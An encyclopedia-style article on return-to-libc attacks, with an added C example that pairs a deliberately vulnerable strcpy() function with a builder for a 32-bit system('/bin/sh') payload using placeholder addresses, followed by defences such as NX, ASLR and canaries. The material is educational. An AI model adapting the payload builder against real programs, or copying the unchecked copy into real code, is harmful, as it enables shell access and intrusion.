Return-to-libc attack

Return-into-libc (also return-to-libc) is a method of attacking computer systems, either to cause damage (e.g. in a denial-of-service attack) or to make the host (server) execute unwanted programs.

Basic principle

Computer programs use a special memory area, the so-called stack, to manage local variables and the return addresses of subroutines. If the stack is manipulated so that, instead of the expected return address, it contains the address of some other function, that function is executed when the subroutine returns and can be used to carry out the desired malicious action. The "libc" is the standard library of the C programming language, a collection of functions that is already mapped into almost every process. No new code therefore has to be injected into the target, as is usually required in shellcode exploits. A popular target in this collection is the function "system()", which runs an arbitrary command through the shell. It needs only one parameter: the command to be executed.

The manipulation of the stack is typically caused by a buffer overflow. A variable that can only hold a certain number of characters is filled with a longer, carefully constructed string; the excess bytes overwrite the return address that lies behind the variable on the stack. In the same way the arguments for the desired (libc) function are written onto the stack, for example the address of a character string such as "/bin/sh". (This stack-based argument layout applies to the 32-bit x86 calling convention; on x86-64, where arguments are passed in registers, the attacker additionally needs small code sequences that load the registers, which leads to return-oriented programming.)

Such an overflow can be triggered by variables that are supplied from outside, e.g. as a parameter in a web address that is handed on to a CGI program. A mandatory precondition for the attack, however, is a vulnerable program that, contrary to good programming practice, does not check the length of its input.
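The following is an added example, not code from the original article. It shows the vulnerable pattern described above (an unchecked copy into a fixed-size buffer) next to a hardened version, and a helper that lays out the classic 32-bit x86 return-to-libc payload: padding up to the saved return address, then the address of system(), then a fake return address for system() (here exit(), so the program ends cleanly), then the address of the "/bin/sh" string. The offset and all addresses are hypothetical constants chosen for illustration; in a real attack they would come from the target binary and its libc. The payload is only built and hex-dumped, never fed to the vulnerable function.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable pattern from the article: strcpy() has no idea how big buf is,
 * so a long input overwrites the saved frame pointer and return address. */
void vulnerable(const char *input) {
    char buf[64];
    strcpy(buf, input);   /* no length check */
    puts(buf);
}

/* Hardened version: the length is checked against the buffer before copying.
 * Returns 0 on success, -1 if the input would not fit. */
int hardened(const char *input, size_t input_len) {
    char buf[64];
    if (input_len >= sizeof buf)
        return -1;
    memcpy(buf, input, input_len);
    buf[input_len] = '\0';
    puts(buf);
    return 0;
}

/* Write a 32-bit value in little-endian byte order (x86 stack layout). */
static void put_le32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)(v);
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

/* Build the classic 32-bit x86 return-to-libc payload.
 *   offset      bytes from the start of the buffer to the saved return address
 *               (buffer size plus saved EBP and any alignment padding)
 *   system_addr address of system() in the target's libc
 *   exit_addr   address system() should "return" to (exit() keeps things quiet)
 *   binsh_addr  address of a "/bin/sh" string, the argument for system()
 * After the overflow the function's ret pops system_addr into EIP; system()
 * then sees exit_addr as its return address and binsh_addr as its first
 * argument, exactly as if it had been called normally.
 * Returns the payload length, or 0 if it does not fit into out. */
size_t build_ret2libc_payload(unsigned char *out, size_t out_cap, size_t offset,
                              uint32_t system_addr, uint32_t exit_addr,
                              uint32_t binsh_addr) {
    size_t len = offset + 3 * 4;
    if (len > out_cap)
        return 0;
    memset(out, 'A', offset);            /* filler up to the return address */
    put_le32(out + offset,     system_addr);
    put_le32(out + offset + 4, exit_addr);
    put_le32(out + offset + 8, binsh_addr);
    return len;
}

int main(void) {
    /* Hypothetical values: a 64-byte buffer, 4 bytes of saved EBP, and
     * made-up libc addresses. Real values come from the target. */
    unsigned char payload[128];
    size_t n = build_ret2libc_payload(payload, sizeof payload, 68,
                                      0xf7e4a000u, 0xf7e3d000u, 0xf7f5c000u);
    printf("payload length: %zu bytes\n", n);
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", payload[i], (i + 1) % 16 == 0 ? "\n" : " ");
    printf("\n");

    /* The hardened copy rejects the same oversized input instead of overflowing. */
    printf("hardened() on payload: %d\n", hardened((const char *)payload, n));
    return 0;
}
```

The filler bytes are arbitrary; what matters is that the three 4-byte values land exactly at the saved return address and the two stack slots above it, which is why the offset has to be measured precisely (with a debugger or a cyclic pattern) before the string is built.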

Protection options

Even a non-executable stack (NX bit), which prevents injected malicious code from being executed, does not stop a return-to-libc attack, since the attack only calls code that already exists in the process. ASLR (address space layout randomization) offers protection, especially on 64-bit systems: the memory addresses of the library functions are chosen randomly at load time, so precisely returning into them becomes unlikely. On 32-bit systems the randomization has only a few bits of entropy and can be brute-forced, which is why the protection is far stronger on 64-bit systems. Stack protection mechanisms such as the Stack Smashing Protector (stack canaries) place a check value in front of the return address and abort the program when it has been overwritten, and can thus detect or prevent such attacks.
